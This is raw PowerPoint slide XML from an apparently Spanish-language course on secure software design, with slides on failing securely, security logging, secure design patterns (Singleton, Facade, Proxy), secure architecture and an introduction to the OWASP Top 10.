        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="CuadroTexto 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092C9CEE-810B-C1C9-DF71-DD6BB9B9A95A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5975249" y="1318343"/>
            <a:ext cx="39811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800" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fallar de forma segura</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="CuadroTexto 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D9711DC-82D2-4A0C-267B-CAF469C17FCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5939789" y="2327829"/>
            <a:ext cx="45872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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Registro de eventos de seguridad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Elipse 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A3B1B08-C615-1AA0-7C20-B0E8213AF074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518638" y="1173907"/>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16" name="Elipse 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0777DDBD-8963-7592-8069-0322D5717C98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518341" y="4582404"/>
            <a:ext cx="747874" cy="688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17" name="Elipse 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A7C160E-F989-E2A4-AF05-DEC3DE10FF47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518270" y="3394775"/>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19" name="Elipse 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEAD8204-88AE-0C5A-FADC-51FCCC6CE438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518199" y="2314031"/>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21" name="Elipse 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0380A7CD-3780-FC4A-66DF-6006EB6A0246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5057159" y="1173907"/>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22" name="Elipse 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7440ECBA-03AF-701D-49C9-E7180EB16DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5057087" y="2314031"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Imagen 22" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AF4ABB5-090E-1D2B-0985-0040022D81F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="590387" y="1225709"/>
            <a:ext cx="597111" cy="596810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Imagen 39" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72CB8D12-3EA8-A182-7DA4-915BF33BC3FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="657548" y="2370076"/>
            <a:ext cx="466268" cy="489811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Imagen 40" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B44314-720F-6FBA-C6BD-3AA92FC626E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="621926" y="3450706"/>
            <a:ext cx="537638" cy="596811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Imagen 41" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E9286CE-BA91-EA10-80C0-31251672708A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="538725" y="4578843"/>
            <a:ext cx="704164" cy="703809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Imagen 42" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69708E13-0409-0374-7ED9-4F96EFB7C3BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5208464" y="1313134"/>
            <a:ext cx="454374" cy="430369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Imagen 43" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D957B3A-683D-0487-342C-6C0BFD06811E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5172828" y="2370062"/>
            <a:ext cx="513849" cy="501701"/>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D4E369C6-0262-B27E-3BB0-4A14F34E941B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11">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120314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70CB1-34F2-A769-9F00-3BEE7D977C3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7CEA1E6-C7A1-BE44-C0BC-E584689F9BE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7A49DC0-8B4F-8789-8F1B-CFED2EF168F7}"/>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Revisión de patrones de diseño seguro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A55F3D3-81F1-3C4F-9239-63F2BC58049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2" descr="Java Singleton">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBD970ED-BF03-FBDE-FE64-8425FAF0C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188" y="1017900"/>
            <a:ext cx="3352116" cy="12142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Facade pattern: definición, ejemplos y representación en diagrama UML -  IONOS">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9CC5E5-E023-867C-04A2-4D502999A8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14" b="9476"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5742069" y="2605612"/>
            <a:ext cx="4475088" cy="19538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Patrón de diseño Proxy en Java - Home">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B87C31A9-44D1-9ED6-57B5-377D937B8D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8759" y="4743352"/>
            <a:ext cx="3568252" cy="128605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8035E39-624E-3A6F-9C0A-3B5D1EB365ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1493490"/>
            <a:ext cx="5049078" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Asegurar que una clase tenga una única instancia, útil en situaciones que requieren un único punto de control como un log de auditoría.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CuadroTexto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4970815F-E17B-2EDC-ADDE-A8DED6882EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3167382"/>
            <a:ext cx="5049078" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Proporciona una interfaz unificada para un conjunto de interfaces en un sistema de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sub-sistemas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, facilitando la implementación de controles de seguridad.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="CuadroTexto 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D499719E-4379-7FA6-A8E3-AECF83EEC1ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4855089"/>
            <a:ext cx="5049078" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Actúa como un intermediario que realiza acciones de seguridad, como autenticación y autorización, antes de permitir el acceso a un objeto real</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9986737E-ACFF-8CE4-2785-02B6F57F96E5}"/>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288270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70F0C-5E55-2DBD-DE67-4D4D1351262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51B7D67-B0E2-2554-6B77-7929468D9563}"/>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B4B95A2-B292-F64E-C8E6-558E66764A34}"/>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Diseño de una arquitectura segura para un sistema específico</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC3E4A8C-EA72-2D67-0093-4B78DB71743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9" name="Imagen 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46A618DA-0465-21B1-318B-7A103E97F391}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657175" y="2357317"/>
            <a:ext cx="6877649" cy="3374163"/>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9AA4A893-0B96-B17D-4489-408B51461FF1}"/>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
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectángulo 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65ED273A-1C3D-D7B4-8F75-5196BC07E7AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1581090"/>
            <a:ext cx="9737666" cy="2031325"/>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s-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identificación de componentes críticos</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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Estrategias de mitigación</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Capas de seguridad</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="864235" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B31166"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1223188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5AF2624-2713-FE08-CC1A-99B3869B2E8D}"/>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22C51A19-E489-0E5E-0C34-AE1F2A1CCFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5384373"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2B1DD68-09C2-DE35-1074-D2ADA830AE7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5907024" y="2703486"/>
            <a:ext cx="6217920" cy="150810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7.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP TOP 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Imagen 1" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D07CE9C-FB4C-9979-2DA7-D75B29622AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D3F5006-2046-ADDD-75C6-04EA2565E5D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279361" y="88094"/>
            <a:ext cx="2231136" cy="871728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="665698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809F-CDE9-673F-A3A9-920C3FFFD2D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AA4FD25-9E96-94F1-BB12-726D8E1E393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B9AF637-218A-6BA4-25A2-C93906E69DAF}"/>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Introducción a OWASP y su Top 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{745E5CCB-92C6-92F6-EBE4-32C43C2D8149}"/>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2" descr="OWASP Medellin | OWASP Foundation">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CDF2B77-7F16-18A3-A4C9-B1069D7E5E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38" y="1180778"/>
            <a:ext cx="2448642" cy="74786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40E6F31-D8FF-E62E-B1AD-A910CE8A8A5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="855280" y="527603"/>
            <a:ext cx="9737666" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B31166"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="185D7F"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B31166"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B31166"/>
              </a:solidFill>
